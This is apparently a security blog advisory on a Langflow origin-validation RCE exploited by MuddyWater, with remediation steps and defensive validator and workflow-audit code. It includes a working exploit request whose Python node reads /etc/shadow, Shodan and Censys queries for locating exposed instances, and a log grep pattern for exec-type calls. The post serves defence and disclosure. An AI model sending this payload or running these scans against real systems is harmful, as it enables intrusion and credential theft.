Tags: CVE Analysis, AI Security, APT. CVE-2025-34291 (CVSS 9.4). Published 2026-05-26 by Ahmed Chiboub

Langflow CVE-2025-34291 — MuddyWater Exploiting AI Orchestration

CISA KEV confirmed May 21, 2026. Iranian state-sponsored MuddyWater actively exploiting unauthenticated RCE in Langflow for credential exfiltration and initial access.

CVE-2025-34291 — Origin Validation Error in Langflow

CVE ID: CVE-2025-34291
CVSS Score: 9.4 (Critical)
CISA KEV: 2026-05-21 — Confirmed active exploitation
Affected Product: Langflow — open-source AI workflow orchestration platform
Affected Versions: All versions prior to the May 2026 patch
Attack Vector: Network — remotely exploitable, no auth required
User Interaction: None
MITRE ATT&CK: T1190 (Exploit Public-Facing Application), T1078 (Valid Accounts), T1040 (Network Sniffing)

Vulnerability Mechanics

CVE-2025-34291 is an origin validation error in Langflow's HTTP API layer. The vulnerability allows an unauthenticated remote attacker to execute arbitrary Python code on the Langflow server by crafting HTTP requests that bypass the platform's origin-based access controls.

Langflow's architecture serializes workflow configurations as JSON sent to /api/v1/flow/execute. The backend deserializes this and executes node operations — including arbitrary Python code execution via "Custom Component" and "Python Function" node types. The origin validator only checks for the presence of an Origin header, not its value. Attackers send requests without an Origin header or with Origin: null, bypassing the guard entirely.

Specific vulnerable code path:

class OriginValidator:
    ALLOWED_ORIGINS = ["https://app.langflow.io", "http://localhost:3000"]

    def validate(self, request):
        origin = request.headers.get("Origin")
        # BUG 1: a missing Origin header (None) or the opaque value "null" is never rejected
        # BUG 2: the substring test accepts any origin whose name happens to contain "langflow"
        if origin in self.ALLOWED_ORIGINS or (origin and "langflow" in origin):
            return True
        return True  # BUG 3: default allow, so an unknown or absent Origin still passes
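A deny-by-default validator that closes the three gaps in the snippet above. This is example code added here, not Langflow's own; the class name, the header-mapping parameter and the normalisation rules are my own choices.

```python
from urllib.parse import urlsplit

class StrictOriginValidator:
    """Deny-by-default replacement for the vulnerable OriginValidator above.

    A missing Origin header or the opaque value "null" is rejected, the allowlist is
    matched on the exact scheme://host[:port] rather than a "langflow" substring, and
    there is no fall-through "return True".
    """
    ALLOWED_ORIGINS = frozenset({"https://app.langflow.io", "http://localhost:3000"})

    def __init__(self, allowed=None):
        self.allowed = frozenset(allowed) if allowed is not None else self.ALLOWED_ORIGINS

    @staticmethod
    def normalize(origin):
        """Return lowercase scheme://host[:port], or None if the value is not a bare origin."""
        parts = urlsplit(origin.strip())
        if parts.scheme not in ("http", "https") or not parts.netloc:
            return None
        if parts.path or parts.query or parts.fragment or "@" in parts.netloc:
            return None  # an Origin header never carries a path, query or credentials
        return f"{parts.scheme}://{parts.netloc}".lower()

    def validate(self, headers):
        """headers: request header mapping (assumed key "Origin"). True only on exact allowlist match."""
        origin = headers.get("Origin")
        if not origin or origin.strip().lower() == "null":
            return False  # the bypass described in the post: absent or null Origin must not pass
        normalized = self.normalize(origin)
        return normalized is not None and normalized in self.allowed
```

Note that a port in the header ("https://app.langflow.io:443") is compared literally, so allowlist entries must be written exactly as browsers send them.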

Exploit payload:

POST /api/v1/flow/execute HTTP/1.1
Host: victim-langflow.internal:7860
Content-Type: application/json

{
  "id": "exploit-flow",
  "nodes": [{
    "id": "payload-1",
    "type": "PythonFunction",
    "data": {
      "code": "import os; import subprocess; result = subprocess.run(['cat', '/etc/shadow'], capture_output=True, text=True); return {'output': result.stdout}"
    }
  }],
  "edges": []
}

MuddyWater Campaign — Tactics and Infrastructure

MuddyWater (SeedWorm, TEMP.Zagros, Cobalt Ulster) is an Iranian state-sponsored espionage group linked to Iran's MOIS, active since 2017. The exploitation of CVE-2025-34291 represents a significant tactical shift from their traditional spear-phishing methodology toward targeting AI infrastructure.

Campaign Timeline

  • 2026-05-10: Early exploitation detected — anomalous API calls to /api/v1/flow/execute from MuddyWater-linked IP ranges hitting Israeli and Saudi academic networks.
  • 2026-05-14: CVE publicly assigned. PoC circulates in Telegram.
  • 2026-05-15: MuddyWater scales scanning. Shodan query http.title:"Langflow" shows increased reconnaissance.
  • 2026-05-17: CISA notified of confirmed exploitation against US defense contractors.
  • 2026-05-21: CISA adds to KEV catalog under BOD 22-01.
  • 2026-05-26: Campaign ongoing — several dozen confirmed compromises.

Post-Exploitation

  1. Credential harvesting: env output scraped for API keys (OpenAI, Anthropic, AWS, Azure) stored as environment variables.
  2. Token exfiltration: .env files, ~/.config/langflow/config.yaml, mounted secrets directories read and exfiltrated.
  3. Persistence: Python-based POWERSTATS variant written to Langflow workflows directory.
  4. Lateral movement: Compromised instance used as pivot for internal network scanning using harvested tokens.

AI Infrastructure Attack Surface

Langflow is often deployed by data science teams without platform engineering security controls, creating dangerous exposure patterns:

Vector                                   | Risk
Default port 7860 on public cloud        | ~1,400 exposed instances globally
No authentication configured (default)   | Any network access = full API access
LLM keys in environment variables        | Exfiltrated within minutes of compromise
Deployed in research sandboxes           | Lack of network segmentation
Docker Compose without network policies  | Lateral movement to all co-hosted services

# Shodan
http.title:"Langflow" port:7860

# Censys
services.http.response.html_title: "Langflow" and services.port: 7860

CISA KEV Response — Timeline and Impact

CISA added CVE-2025-34291 to the KEV catalog on 2026-05-21, triggering BOD 22-01 requirements for federal agencies: remediation within 7 days (due 2026-05-28). Required action: apply vendor patch or isolate affected systems.

# Check if vulnerable
curl -s -o /dev/null -w "%{http_code}" \
  -X POST http://localhost:7860/api/v1/flow/execute \
  -H "Content-Type: application/json" \
  -d '{"id":"test","nodes":[],"edges":[]}'

# 200 = vulnerable; 401/403 = auth enforced

Technical Remediation

Immediate (First Hour)

  1. Isolate: Remove public network access to port 7860. aws ec2 revoke-security-group-ingress --group-id sg-xxxxx --protocol tcp --port 7860 --cidr 0.0.0.0/0
  2. Patch: pip install --upgrade langflow or pull latest Docker image.
  3. Rotate all credentials: Every API key and token stored in the Langflow environment.

Short-Term (First Week)

  1. Enable authentication: LANGFLOW_AUTH_TYPE=basic with bcrypt-hashed password.
  2. Deploy WAF rule (ModSecurity 2.7+ requires an id; use any unused local rule number): SecRule REQUEST_URI "^/api/v1/flow/execute" "id:100001,phase:1,deny,status:403"
  3. Audit logs for compromise: grep -r "subprocess\|os\.system\|eval\|exec\|__import__" /var/log/langflow/*.log
  4. Deploy YARA rule for MuddyWater backdoor (POWERSTATS variant in workflows directory).
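The grep in step 3 looks for exploitation in logs; the added example below instead audits the stored workflow JSON (the shape shown in the payload above) for code-executing nodes whose code imports process or network modules or calls dynamic-execution builtins, which covers both the injected flows and the workflows-directory persistence described under Post-Exploitation. This is my own example, not Langflow tooling; the node type "PythonFunction" and the data.code field come from the post, while "CustomComponent" as a type name and the module and builtin lists are assumptions.

```python
import ast
import json
CODE_NODE_TYPES = {"PythonFunction", "CustomComponent"}   # node types that execute Python
RISKY_MODULES = {"os", "subprocess", "socket", "ctypes", "shutil", "urllib", "requests"}
RISKY_BUILTINS = {"eval", "exec", "__import__", "compile"}

def findings_for_code(code):
    """Return sorted findings (risky imports and calls) for one node's code, or ['unparseable']."""
    try:
        tree = ast.parse(code)  # accepts a module-level 'return'; only compile() rejects it
    except SyntaxError:
        return ["unparseable"]  # cannot be vetted, so report it instead of silently passing it
    hits = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            hits.update("import:" + a.name.split(".")[0] for a in node.names
                        if a.name.split(".")[0] in RISKY_MODULES)
        elif isinstance(node, ast.ImportFrom) and (node.module or "").split(".")[0] in RISKY_MODULES:
            hits.add("import:" + node.module.split(".")[0])
        elif isinstance(node, ast.Call):
            f = node.func
            if isinstance(f, ast.Name) and f.id in RISKY_BUILTINS:
                hits.add("call:" + f.id)
            elif isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name) and f.value.id in RISKY_MODULES:
                hits.add("call:" + f.value.id + "." + f.attr)
    return sorted(hits)

def audit_flow(flow):
    """Map node id -> findings for each code-executing node of a flow (JSON string or parsed dict)."""
    if isinstance(flow, str):
        flow = json.loads(flow)
    report = {}
    for node in flow.get("nodes", []):
        if node.get("type") in CODE_NODE_TYPES:
            found = findings_for_code((node.get("data") or {}).get("code", ""))
            if found:
                report[node.get("id", "?")] = found
    return report

# Constructed sample flow: a benign text node plus a node shaped like the payload in the post (harmless command).
SAMPLE_FLOW = json.dumps({"id": "flow-1", "edges": [], "nodes": [
    {"id": "node-a", "type": "PythonFunction",
     "data": {"code": "return {'text': inputs['text'].upper()}"}},
    {"id": "node-b", "type": "PythonFunction",
     "data": {"code": "import os, subprocess\nr = subprocess.run(['id'], capture_output=True, text=True)\nreturn {'output': r.stdout}"}},
]})

if __name__ == "__main__":
    print(json.dumps(audit_flow(SAMPLE_FLOW), indent=2))
```

Run it over every *.json under the workflows directory and treat any non-empty report, and any "unparseable" node, as a triage item rather than a verdict.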

Long-Term (Next Month)

  1. Network segmentation: Langflow in isolated VPC, reverse proxy with mandatory auth.
  2. Credentials management: Use secrets manager (Vault, AWS Secrets Manager) — no env vars for API keys.
  3. SBOM-driven vulnerability management: Langflow in your software bill of materials tracking.

Bottom Line

CVE-2025-34291 (CVSS 9.4) — critical origin validation RCE in Langflow, actively exploited by Iranian state-sponsored MuddyWater for initial access and credential exfiltration. CISA KEV confirmed May 21, 2026. Isolate, patch, audit, rotate. The API keys stored on the compromised server grant access to your entire LLM provider footprint.

Published simultaneously on LinkedIn
